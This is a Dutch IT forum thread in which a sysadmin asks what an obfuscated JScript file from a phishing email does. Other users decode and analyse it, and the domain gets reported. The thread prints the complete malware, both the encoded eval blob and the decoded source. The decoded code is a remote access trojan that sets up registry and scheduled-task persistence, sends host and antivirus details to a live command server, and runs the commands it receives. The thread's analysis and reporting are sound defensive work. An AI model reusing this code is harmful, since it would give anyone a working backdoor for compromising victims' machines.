Toon posts:

Bedrijf mogelijk doelwit van aanval: wat doet dit script?

Pagina: 1
Acties:

dinsdag 14 februari 2017 11:34

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
Het bedrijf waar ik sysadmin ben is het mogelijk doelwit in iets wat op een hack-poging lijkt :X .
Via een zorgvuldig opgestelde mail met een (niet zichtbare) bit.ly link werd door een werknemer een zip-file gedownload waarin een JS file zat. Het script werd niet uitgevoerd, maar de inhoud intrigeert me wel.
Omdat het er op lijkt dat wij specifiek als doel zijn uitgekozen wil ik graag zo veel mogelijk informatie verzamelen.

Mijn kennis van coding is niet nihil, maar dit stukje javascript (of JScript?) zegt me werkelijk niets.
Een variabele wordt opgevuld met een hoop karakters, maar het doel ontgaat me.
Ik hoop dat iemand op GoT mij wat meer duidelijkheid kan geven.

De inhoud van het script:
code:
1
2
3
4
5

try {
//slp
var s = String.fromCharCode(47,47,32,67,111,100,101,100,32,98,121,32,118,95,66,48,49,32,124,32,83,108,105,101,109,101,114,101,122,32,45,62,32,84,119,105,116,116,101,114,32,58,32,83,108,105,101,109,101,114,101,122,13,10,13,10,118,97,114,32,106,32,61,32,91,34,87,83,99,114,105,112,116,46,83,104,101,108,108,34,44,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,93,59,13,10,118,97,114,32,103,32,61,32,91,34,72,75,67,85,34,44,34,72,75,76,77,34,44,34,72,75,67,85,92,92,118,106,119,48,114,109,34,44,34,92,92,83,111,102,116,119,97,114,101,92,92,77,105,99,114,111,115,111,102,116,92,92,87,105,110,100,111,119,115,92,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,92,82,117,110,92,92,34,44,34,72,75,76,77,92,92,83,79,70,84,87,65,82,69,92,92,67,108,97,115,115,101,115,92,92,34,44,34,82,69,71,95,83,90,34,44,34,92,92,100,101,102,97,117,108,116,105,99,111,110,92,92,34,93,59,13,10,118,97,114,32,121,32,61,32,91,34,119,105,110,109,103,109,116,115,58,34,44,34,119,105,110,51,50,95,108,111,103,105,99,97,108,100,105,115,107,34,44,34,87,105,110,51,50,95,79,112,101,114,97,116,105,110,103,83,121,115,116,101,109,34,44,39,65,110,116,105,86,105,114,117,115,80,114,111,100,117,99,116,39,93,59,13,10,13,10,118,97,114,32,115,104,32,61,32,67,114,40,48,41,59,13,10,118,97,114,32,102,115,32,61,32,67,114,40,49,41,59,13,10,118,97,114,32,115,112,108,32,61,32,34,124,86,124,34,59,13,10,118,97,114,32,67,104,32,61,32,34,92,92,34,59,13,10,118,97,114,32,86,78,32,61,32,34,79,114,97,110,103,101,34,32,43,32,34,95,34,32,43,32,79,98,40,54,41,59,13,10,118,97,114,32,102,117,32,61,32,87,83,99,114,105,112,116,46,83,99,114,105,112,116,70,117,108,108,78,97,109,101,59,13,10,118,97,114,32,119,110,32,61,32,87,83,99,114,105,112,116,46,83,99,114,105,112,116,78,97,109,101,59,13,10,118,97,114,32,85,59,13,10,116,114,121,32,123,13,10,85,32,61,32,115,104,46,82,101,103,82,101,97,100,40,103,91,50,93,41,59,13,10,125,32,99,97,116,99,104,40,101,114,114,41,32,123,13,10,118,97,114,32,115,118,32,61,32,102,117,46,115,112,108,105,116,40,34,92,92,34,41,59,13,10,105,102,32,40,34,58,92,92,34,32,43,32,115,118,91,49,93,32,61,61,32,34,58,92,92,34,32,43,32,119,110,41,32,123,13,10,85,32,61,32,34,84,82,85,69,34,59,13,10,115,104,46,82,101,103,87,114,105,116,101,40,103,91,50,93,44,85,44,103,91,53,93,41,59,13,10,125,32,101,108,115,101,32,123,13,10,85,32,61,32,34,70,65,76,83,69,34,59,13,10,115,104,46,82,101,103,87,114,105,116,101,40,103,91,50,93,44,85,44,103,91,53,93,41,59,13,10,125,13,10,125,13,10,78,115,40,41,59,13,10,100,111,32,123,13,10,116,114,121,32,123,13,10,118,97,114,32,80,32,61,32,80,116,40,39,86,114,101,39,44,39,39,41,59,13,10,80,32,61,32,80,46,115,112,108,105,116,40,115,112,108,41,59,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,67,108,34,41,32,123,13,10,87,83,99,114,105,112,116,46,81,117,105,116,40,49,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,83,99,34,41,32,123,13,10,118,97,114,32,115,50,32,61,32,69,120,40,34,116,101,109,112,34,41,32,43,32,34,92,92,34,32,43,32,80,91,50,93,59,13,10,118,97,114,32,102,105,32,61,32,102,115,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,115,50,44,116,114,117,101,41,59,13,10,102,105,46,87,114,105,116,101,40,80,91,49,93,41,59,13,10,102,105,46,67,108,111,115,101,40,41,59,13,10,115,104,46,114,117,110,40,115,50,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,69,120,34,41,32,123,13,10,101,118,97,108,40,80,91,49,93,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,82,110,34,41,32,123,13,10,118,97,114,32,114,105,32,61,32,102,115,46,79,112,101,110,84,101,120,116,70,105,108,101,40,102,117,44,49,41,59,13,10,118,97,114,32,102,114,32,61,32,114,105,46,82,101,97,100,65,108,108,40,41,59,13,10,114,105,46,67,108,111,115,101,40,41,59,13,10,86,78,32,61,32,86,78,46,115,112,108,105,116,40,34,95,34,41,59,13,10,102,114,32,61,32,102,114,46,114,101,112,108,97,99,101,40,86,78,91,48,93,44,80,91,49,93,41,59,13,10,118,97,114,32,119,105,32,61,32,102,115,46,79,112,101,110,84,101,120,116,70,105,108,101,40,102,117,44,50,44,102,97,108,115,101,41,59,13,10,119,105,46,87,114,105,116,101,40,102,114,41,59,13,10,119,105,46,67,108,111,115,101,40,41,59,13,10,115,104,46,114,117,110,40,34,119,115,99,114,105,112,116,46,101,120,101,32,47,47,66,32,92,34,34,32,43,32,102,117,32,43,32,34,92,34,34,41,59,13,10,87,83,99,114,105,112,116,46,81,117,105,116,40,49,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,85,112,34,41,32,123,13,10,118,97,114,32,115,50,32,61,32,69,120,40,34,116,101,109,112,34,41,32,43,32,34,92,92,34,32,43,32,80,91,50,93,59,13,10,118,97,114,32,99,116,102,32,61,32,102,115,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,115,50,44,116,114,117,101,41,59,13,10,118,97,114,32,103,117,32,61,32,80,91,49,93,59,13,10,103,117,32,61,32,103,117,46,114,101,112,108,97,99,101,40,34,124,85,124,34,44,34,124,86,124,34,41,59,13,10,99,116,102,46,87,114,105,116,101,40,103,117,41,59,13,10,99,116,102,46,67,108,111,115,101,40,41,59,13,10,115,104,46,114,117,110,40,34,119,115,99,114,105,112,116,46,101,120,101,32,47,47,66,32,92,34,34,32,43,32,115,50,32,43,32,34,92,34,34,44,54,41,59,13,10,87,83,99,114,105,112,116,46,81,117,105,116,40,49,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,85,110,34,41,32,123,13,10,118,97,114,32,115,50,32,61,32,80,91,49,93,59,13,10,118,97,114,32,118,100,114,32,61,32,69,120,40,34,84,101,109,112,34,41,32,43,32,67,104,32,43,32,119,110,59,13,10,118,97,114,32,114,101,103,105,32,61,32,34,49,54,80,50,83,48,79,51,77,78,34,59,13,10,115,50,32,61,32,115,50,46,114,101,112,108,97,99,101,40,34,37,102,34,44,102,117,41,46,114,101,112,108,97,99,101,40,34,37,110,34,44,119,110,41,46,114,101,112,108,97,99,101,40,34,37,115,102,100,114,34,44,118,100,114,41,46,114,101,112,108,97,99,101,40,34,37,82,103,78,101,37,34,44,114,101,103,105,41,59,13,10,101,118,97,108,40,115,50,41,59,13,10,87,83,99,114,105,112,116,46,81,117,105,116,40,49,41,59,13,10,125,13,10,13,10,105,102,32,40,80,91,48,93,32,61,61,61,32,34,82,70,34,41,32,123,13,10,118,97,114,32,115,50,32,61,32,69,120,40,34,116,101,109,112,34,41,32,43,32,34,92,92,34,32,43,32,80,91,50,93,59,13,10,118,97,114,32,102,105,32,61,32,102,115,46,67,114,101,97,116,101,84,101,120,116,70,105,108,101,40,115,50,44,116,114,117,101,41,59,13,10,102,105,46,87,114,105,116,101,40,80,91,49,93,41,59,13,10,102,105,46,67,108,111,115,101,40,41,59,13,10,115,104,46,114,117,110,40,115,50,41,59,13,10,125,13,10,125,32,99,97,116,99,104,40,101,114,114,41,32,123,13,10,125,13,10,87,83,99,114,105,112,116,46,83,108,101,101,112,40,55,48,48,48,41,59,13,10,13,10,125,32,119,104,105,108,101,32,40,116,114,117,101,41,32,59,13,10,13,10,13,10,102,117,110,99,116,105,111,110,32,69,120,40,83,41,32,123,13,10,114,101,116,117,114,110,32,115,104,46,69,120,112,97,110,100,69,110,118,105,114,111,110,109,101,110,116,83,116,114,105,110,103,115,40,34,37,34,32,43,32,83,32,43,32,34,37,34,41,59,13,10,125,13,10,102,117,110,99,116,105,111,110,32,80,116,40,67,44,65,41,32,123,13,10,118,97,114,32,88,32,61,32,67,114,40,51,41,59,13,10,88,46,111,112,101,110,40,39,80,79,83,84,39,44,39,104,116,116,112,58,47,47,112,111,115,116,118,101,110,116,97,45,118,111,100,97,102,111,110,101,46,100,117,99,107,100,110,115,46,111,114,103,58,53,48,48,49,47,39,32,43,32,67,44,32,102,97,108,115,101,41,59,13,10,88,46,83,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,85,115,101,114,45,65,103,101,110,116,58,34,44,110,102,40,41,41,59,13,10,88,46,115,101,110,100,40,65,41,59,13,10,114,101,116,117,114,110,32,88,46,114,101,115,112,111,110,115,101,116,101,120,116,59,13,10,125,13,10,13,10,13,10,102,117,110,99,116,105,111,110,32,110,102,40,41,32,123,13,10,118,97,114,32,115,44,78,84,44,105,59,13,10,105,102,32,40,102,115,46,102,105,108,101,101,120,105,115,116,115,40,69,120,40,34,87,105,110,100,105,114,34,41,32,43,32,34,92,92,77,105,99,114,111,115,111,102,116,46,78,69,84,92,92,70,114,97,109,101,119,111,114,107,92,92,118,50,46,48,46,53,48,55,50,55,92,92,118,98,99,46,101,120,101,34,41,41,32,123,13,10,78,84,32,61,34,89,69,83,34,59,13,10,125,32,101,108,115,101,32,123,13,10,78,84,32,61,32,34,78,79,34,59,13,10,125,13,10,115,32,61,32,86,78,32,43,32,67,104,32,43,32,69,120,40,34,67,79,77,80,85,84,69,82,78,65,77,69,34,41,32,43,32,67,104,32,43,32,69,120,40,34,85,83,69,82,78,65,77,69,34,41,32,43,32,67,104,32,43,32,79,98,40,50,41,32,43,32,67,104,32,43,32,79,98,40,52,41,32,43,32,67,104,32,43,32,67,104,32,43,32,78,84,32,43,32,67,104,32,43,32,85,32,43,32,67,104,59,13,10,114,101,116,117,114,110,32,115,59,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,67,114,40,78,41,32,123,13,10,9,114,101,116,117,114,110,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,106,91,78,93,41,59,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,79,98,40,78,41,32,123,13,10,118,97,114,32,115,59,13,10,105,102,32,40,78,32,61,61,32,50,41,32,123,13,10,115,32,61,32,71,101,116,79,98,106,101,99,116,40,121,91,48,93,41,46,73,110,115,116,97,110,99,101,115,79,102,40,121,91,50,93,41,59,13,10,118,97,114,32,101,110,32,61,32,110,101,119,32,69,110,117,109,101,114,97,116,111,114,40,115,41,59,13,10,102,111,114,32,40,59,32,33,101,110,46,97,116,69,110,100,40,41,59,101,110,46,109,111,118,101,78,101,120,116,40,41,41,32,123,13,10,118,97,114,32,105,116,32,61,32,101,110,46,105,116,101,109,40,41,59,13,10,114,101,116,117,114,110,32,105,116,46,67,97,112,116,105,111,110,59,13,10,98,114,101,97,107,59,13,10,125,13,10,125,13,10,105,102,32,40,78,32,61,61,32,52,41,32,123,13,10,118,97,114,32,119,109,103,32,61,32,34,119,105,110,109,103,109,116,115,58,92,92,92,92,108,111,99,97,108,104,111,115,116,92,92,114,111,111,116,92,92,115,101,99,117,114,105,116,121,99,101,110,116,101,114,34,59,13,10,115,32,61,32,71,101,116,79,98,106,101,99,116,40,119,109,103,41,46,73,110,115,116,97,110,99,101,115,79,102,40,121,91,51,93,41,59,13,10,118,97,114,32,101,110,32,61,32,110,101,119,32,69,110,117,109,101,114,97,116,111,114,40,115,41,59,13,10,102,111,114,32,40,59,32,33,101,110,46,97,116,69,110,100,40,41,59,101,110,46,109,111,118,101,78,101,120,116,40,41,41,32,123,13,10,118,97,114,32,105,116,32,61,32,101,110,46,105,116,101,109,40,41,59,13,10,118,97,114,32,115,116,114,32,61,32,105,116,46,68,105,115,112,108,97,121,78,97,109,101,59,13,10,125,13,10,105,102,32,40,115,116,114,32,33,61,61,32,39,39,41,32,123,13,10,119,109,103,32,61,32,119,109,103,32,43,32,34,50,34,59,13,10,115,32,61,32,71,101,116,79,98,106,101,99,116,40,119,109,103,41,46,73,110,115,116,97,110,99,101,115,79,102,40,121,91,51,93,41,59,13,10,101,110,32,61,32,110,101,119,32,69,110,117,109,101,114,97,116,111,114,40,115,41,59,13,10,102,111,114,32,40,59,32,33,101,110,46,97,116,69,110,100,40,41,59,101,110,46,109,111,118,101,78,101,120,116,40,41,41,32,123,13,10,105,116,32,61,32,101,110,46,105,116,101,109,40,41,59,13,10,114,101,116,117,114,110,32,105,116,46,68,105,115,112,108,97,121,78,97,109,101,59,13,10,125,13,10,125,32,101,108,115,101,32,123,13,10,114,101,116,117,114,110,32,105,116,46,68,105,115,112,108,97,121,78,97,109,101,59,13,10,125,13,10,125,13,10,105,102,32,40,78,61,61,54,41,32,123,13,10,115,32,61,32,71,101,116,79,98,106,101,99,116,40,121,91,48,93,41,46,73,110,115,116,97,110,99,101,115,79,102,40,121,91,49,93,41,59,13,10,118,97,114,32,101,110,32,61,32,110,101,119,32,69,110,117,109,101,114,97,116,111,114,40,115,41,59,13,10,102,111,114,32,40,59,32,33,101,110,46,97,116,69,110,100,40,41,59,101,110,46,109,111,118,101,78,101,120,116,40,41,41,32,123,13,10,118,97,114,32,105,116,32,61,32,101,110,46,105,116,101,109,40,41,59,13,10,114,101,116,117,114,110,32,105,116,46,118,111,108,117,109,101,115,101,114,105,97,108,110,117,109,98,101,114,59,13,10,98,114,101,97,107,59,13,10,125,13,10,125,13,10,125,13,10,13,10,102,117,110,99,116,105,111,110,32,78,115,40,41,32,123,13,10,9,118,97,114,32,100,114,32,61,32,69,120,40,34,84,69,77,80,34,41,32,43,32,67,104,32,43,32,119,110,59,13,10,9,116,114,121,32,123,13,10,9,9,102,115,46,67,111,112,121,70,105,108,101,40,102,117,44,100,114,44,116,114,117,101,41,59,13,10,9,125,32,99,97,116,99,104,40,101,114,114,41,32,123,13,10,9,125,13,10,9,116,114,121,32,123,13,10,9,9,115,104,46,82,101,103,87,114,105,116,101,40,103,91,48,93,32,43,32,103,91,51,93,32,43,32,34,49,54,80,50,83,48,79,51,77,78,34,44,34,92,34,34,32,43,32,100,114,32,43,32,34,92,34,34,44,103,91,53,93,41,59,13,10,9,9,125,32,99,97,116,99,104,40,101,114,114,41,32,123,13,10,9,125,13,10,9,116,114,121,32,123,13,10,9,9,115,104,46,114,117,110,40,34,83,99,104,116,97,115,107,115,32,47,99,114,101,97,116,101,32,47,115,99,32,109,105,110,117,116,101,32,47,109,111,32,51,48,32,47,116,110,32,83,107,121,112,101,32,47,116,114,32,92,34,34,32,43,32,100,114,44,102,97,108,115,101,41,59,13,10,9,9,125,32,99,97,116,99,104,40,101,114,114,41,32,123,13,10,9,125,13,10,9,9,13,10,9,13,10,125,13,10,13,10,13,10);
eval(s);
} catch(err) { }


Ik heb er alvast een naar gevoel bij, dus ergens hoop ik vooral dat dit onschuldiger is dan het lijkt.

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

dinsdag 14 februari 2017 11:36

Acties:
  • 0 Henk 'm!
  • mstx
  • Registratie: Februari 2004
  • Niet online

mstx

Dit is de inhoud van de string:

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181

// Coded by v_B01 | Sliemerez -> Twitter : Sliemerez

var j = ["WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];
var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];

var sh = Cr(0);
var fs = Cr(1);
var spl = "|V|";
var Ch = "\\";
var VN = "Orange" + "_" + Ob(6);
var fu = WScript.ScriptFullName;
var wn = WScript.ScriptName;
var U;
try {
U = sh.RegRead(g[2]);
} catch(err) {
var sv = fu.split("\\");
if (":\\" + sv[1] == ":\\" + wn) {
U = "TRUE";
sh.RegWrite(g[2],U,g[5]);
} else {
U = "FALSE";
sh.RegWrite(g[2],U,g[5]);
}
}
Ns();
do {
try {
var P = Pt('Vre','');
P = P.split(spl);

if (P[0] === "Cl") {
WScript.Quit(1);
}

if (P[0] === "Sc") {
var s2 = Ex("temp") + "\\" + P[2];
var fi = fs.CreateTextFile(s2,true);
fi.Write(P[1]);
fi.Close();
sh.run(s2);
}

if (P[0] === "Ex") {
eval(P[1]);
}

if (P[0] === "Rn") {
var ri = fs.OpenTextFile(fu,1);
var fr = ri.ReadAll();
ri.Close();
VN = VN.split("_");
fr = fr.replace(VN[0],P[1]);
var wi = fs.OpenTextFile(fu,2,false);
wi.Write(fr);
wi.Close();
sh.run("wscript.exe //B \"" + fu + "\"");
WScript.Quit(1);
}

if (P[0] === "Up") {
var s2 = Ex("temp") + "\\" + P[2];
var ctf = fs.CreateTextFile(s2,true);
var gu = P[1];
gu = gu.replace("|U|","|V|");
ctf.Write(gu);
ctf.Close();
sh.run("wscript.exe //B \"" + s2 + "\"",6);
WScript.Quit(1);
}

if (P[0] === "Un") {
var s2 = P[1];
var vdr = Ex("Temp") + Ch + wn;
var regi = "16P2S0O3MN";
s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);
eval(s2);
WScript.Quit(1);
}

if (P[0] === "RF") {
var s2 = Ex("temp") + "\\" + P[2];
var fi = fs.CreateTextFile(s2,true);
fi.Write(P[1]);
fi.Close();
sh.run(s2);
}
} catch(err) {
}
WScript.Sleep(7000);

} while (true) ;


function Ex(S) {
return sh.ExpandEnvironmentStrings("%" + S + "%");
}
function Pt(C,A) {
var X = Cr(3);
X.open('POST','http://postventa-vodafone.duckdns.org:5001/' + C, false);
X.SetRequestHeader("User-Agent:",nf());
X.send(A);
return X.responsetext;
}


function nf() {
var s,NT,i;
if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {
NT ="YES";
} else {
NT = "NO";
}
s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
return s;
}

function Cr(N) {
    return new ActiveXObject(j[N]);
}

function Ob(N) {
var s;
if (N == 2) {
s = GetObject(y[0]).InstancesOf(y[2]);
var en = new Enumerator(s);
for (; !en.atEnd();en.moveNext()) {
var it = en.item();
return it.Caption;
break;
}
}
if (N == 4) {
var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
s = GetObject(wmg).InstancesOf(y[3]);
var en = new Enumerator(s);
for (; !en.atEnd();en.moveNext()) {
var it = en.item();
var str = it.DisplayName;
}
if (str !== '') {
wmg = wmg + "2";
s = GetObject(wmg).InstancesOf(y[3]);
en = new Enumerator(s);
for (; !en.atEnd();en.moveNext()) {
it = en.item();
return it.DisplayName;
}
} else {
return it.DisplayName;
}
}
if (N==6) {
s = GetObject(y[0]).InstancesOf(y[1]);
var en = new Enumerator(s);
for (; !en.atEnd();en.moveNext()) {
var it = en.item();
return it.volumeserialnumber;
break;
}
}
}

function Ns() {
    var dr = Ex("TEMP") + Ch + wn;
    try {
        fs.CopyFile(fu,dr,true);
    } catch(err) {
    }
    try {
        sh.RegWrite(g[0] + g[3] + "16P2S0O3MN","\"" + dr + "\"",g[5]);
        } catch(err) {
    }
    try {
        sh.run("Schtasks /create /sc minute /mo 30 /tn Skype /tr \"" + dr,false);
        } catch(err) {
    }
        
    
}

dinsdag 14 februari 2017 11:41

Acties:
  • 0 Henk 'm!
  • garriej
  • Registratie: December 2012
  • Laatst online: 08-08 15:58

garriej

Ik las ondertieten.

Gezien er een Twitter in het script staat, misschien even een berichtje sturen :+

dinsdag 14 februari 2017 11:42

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
Ben al aan het kijken op die Twitter account, voorspelt al niet veel goeds... Veel arabisch ook :|

Dat vbscript ziet er al wat minder vrolijk uit. Crap zeg, nu nog maar zien uit te zoeken wat dit script allemaal exact doet (buiten dus Registry keys, etc aanmaken)
mstx schreef op dinsdag 14 februari 2017 @ 11:36:
Dit is de inhoud van de string:
*knip*
Bedankt!! Hoe heb je dit exact omgezet (op een veilige manier)? Wel handig om te weten voor in de toekomst.

[ Voor 34% gewijzigd door Darkstar op 14-02-2017 11:48 ]

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

dinsdag 14 februari 2017 11:50

Acties:
  • +1 Henk 'm!
  • mstx
  • Registratie: Februari 2004
  • Niet online

mstx

Darkstar schreef op dinsdag 14 februari 2017 @ 11:42:
[...]

Bedankt!! Hoe heb je dit exact omgezet (op een veilige manier)? Wel handig om te weten voor in de toekomst.
eval(s); veranderen in console.log(s);, dan krijg je de output in je console zonder dat het wordt uitgevoerd.

dinsdag 14 februari 2017 11:51

Acties:
  • +1 Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 11:50

frickY

Meldt het adres, http://postventa-vodafone.duckdns.org:5001/, ook even aan voor phising
https://safebrowsing.goog.../report_phish/?rd=1&hl=nl

Scheelt weer als die geblokkeerd wordt door de grote browsers.

[ Voor 5% gewijzigd door frickY op 14-02-2017 11:52 ]

dinsdag 14 februari 2017 11:57

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
frickY schreef op dinsdag 14 februari 2017 @ 11:51:
Meldt het adres, http://postventa-vodafone.duckdns.org:5001/, ook even aan voor phising
https://safebrowsing.goog.../report_phish/?rd=1&hl=nl

Scheelt weer als die geblokkeerd wordt door de grote browsers.
Done, goede tip!

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

dinsdag 14 februari 2017 12:01

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
Als ik het een beetje goed begrijp is dit een script dat dus vooral wat systeemvariabelen en usernames gaat uploaden naar die site.
Lijkt dus eerder op een botnet of ben ik verkeerd? Een backdoor lijkt me ook nog wel een optie

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

dinsdag 14 februari 2017 12:04

Acties:
  • +1 Henk 'm!
  • arjants
  • Registratie: Mei 2000
  • Niet online

arjants

Darkstar schreef op dinsdag 14 februari 2017 @ 12:01:
Als ik het een beetje goed begrijp is dit een script dat dus vooral wat systeemvariabelen en usernames gaat uploaden naar die site.
Lijkt dus eerder op een botnet of ben ik verkeerd? Een backdoor lijkt me ook nog wel een optie
Inderdaad een botnet poging, er komen er hier dagelijks ontzettend veel voorbij in de mailscanners :)
Je word dan onderdeel van een command and control server waarmee ze diverse codes remote uit kunnen voeren.

Sliemerez werkt er al een tijdje aan gezien zijn timeline op twitter.
Afbeeldingslocatie: https://pbs.twimg.com/media/C2sm36JXUAAL7cE.jpg:large

[ Voor 5% gewijzigd door arjants op 14-02-2017 12:05 ]

We worden allemaal geconfronteerd met een reeks grootse kansen, op schitterende wijze vermomd als onoplosbare problemen. (John W. Gardner)

dinsdag 14 februari 2017 12:06

Acties:
  • 0 Henk 'm!
  • vinnux
  • Registratie: Maart 2001
  • Niet online

vinnux

Wat ik er zo snel uit opmaak is dat er connectie (HTTP POST) gemaakt wordt met http://postventa-vodafone.duckdns.org:5001/Vre en afhankelijk van de response wat zaken gaat uitvoeren. Éen actie is b.v. het uitvoeren van een script die in de response zit.

In het verzoek stopt hij gegevens in Header user.agent welke de rest van het script verzameld.

Daarnaast wordt er een scheduled task aangemaakt met de naam skype welke elke 30 minuten uitgevoerd wordt. De task voert dit script nogmaals uit.

[ Voor 36% gewijzigd door vinnux op 14-02-2017 12:23 ]

dinsdag 14 februari 2017 12:09

Acties:
  • 0 Henk 'm!
  • mcDavid
  • Registratie: April 2008
  • Laatst online: 22-09 20:16

mcDavid

Darkstar schreef op dinsdag 14 februari 2017 @ 11:57:
[...]


Done, goede tip!
je zou ook een abuse-melding kunnen doen bij duckdns.

[ Voor 57% gewijzigd door mcDavid op 14-02-2017 12:09 ]

dinsdag 14 februari 2017 12:23

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
mcDavid schreef op dinsdag 14 februari 2017 @ 12:09:
[...]

je zou ook een abuse-melding kunnen doen bij duckdns.
Wordt ook aan gewerkt, thanks!

Zijn er nog andere diensten / instanties die kunnen ingelicht worden voor dergelijke zaken?

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

dinsdag 14 februari 2017 13:13

Acties:
  • 0 Henk 'm!
  • MaD_co
  • Registratie: Oktober 2002
  • Laatst online: 09:25

MaD_co

Zat dit bestand verstopt in een mail welke werd beschreven als factuur xxxxxx (random nummer)?
Hebben deze gister namelijk ontvangen (alert genoeg om niet te openen, maar lijkt nu flink de ronde te doen)

ATI X300 std @ 324/195 stable @ 432/283 @ 13202 3dmarks http://service.futuremark.com/compare?2k1=8575346

dinsdag 14 februari 2017 13:47

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
MaD_co schreef op dinsdag 14 februari 2017 @ 13:13:
Zat dit bestand verstopt in een mail welke werd beschreven als factuur xxxxxx (random nummer)?
Hebben deze gister namelijk ontvangen (alert genoeg om niet te openen, maar lijkt nu flink de ronde te doen)
Nee, enkel een bit.ly link achter een afbeelding die er uit ziet als een attachment in Gmail, de attachment heet zogezegd output.pdf. Er wordt wel melding gemaakt van een factuur.
De bit.ly link verwijst naar hxxps://inhaled-attempts.000webhostapp.com (ook al gerapporteerd) waar een Outpout.zip file (inclusief spelfout) gedownload wordt.

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

woensdag 15 februari 2017 15:14

Acties:
  • 0 Henk 'm!

Verwijderd

Virus: Script.Trojan.Obfus.AS

donderdag 16 februari 2017 12:36

Acties:
  • +1 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
Update: de site is geblokkeerd via duckdns.org, dus in principe heeft de hacker geen controle meer over zijn botnet.
Hij zal in ieder geval alle geïnfecteerde systemen moeten voorzien van een nieuw obfuscated Jscript aangezien de url er hardcoded in zit.

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

zaterdag 25 februari 2017 14:29

Acties:
  • 0 Henk 'm!
  • Kabouterplop01
  • Registratie: Maart 2002
  • Laatst online: 19-09 22:56

Kabouterplop01

chown -R me base:all

Zouden jullie die links unclickable kunnen maken?
maak er zoiets van:
hxxps://, of hxxp://

maandag 27 februari 2017 09:03

Acties:
  • 0 Henk 'm!
  • Darkstar
  • Registratie: September 2007
  • Laatst online: 27-01-2023

Darkstar

BSOFH

Topicstarter
Kabouterplop01 schreef op zaterdag 25 februari 2017 @ 14:29:
Zouden jullie die links unclickable kunnen maken?
maak er zoiets van:
hxxps://, of hxxp://
In mijn posts al gedaan, inderdaad nogal stom om ze er zo in te zetten :X

 MacBook Pro | iPhone 6 64GB Space Gray | iPad (2017) | Apple Watch series 0 - Some people just need a high five... in the face... with a chair

Pagina: 1
Reageer

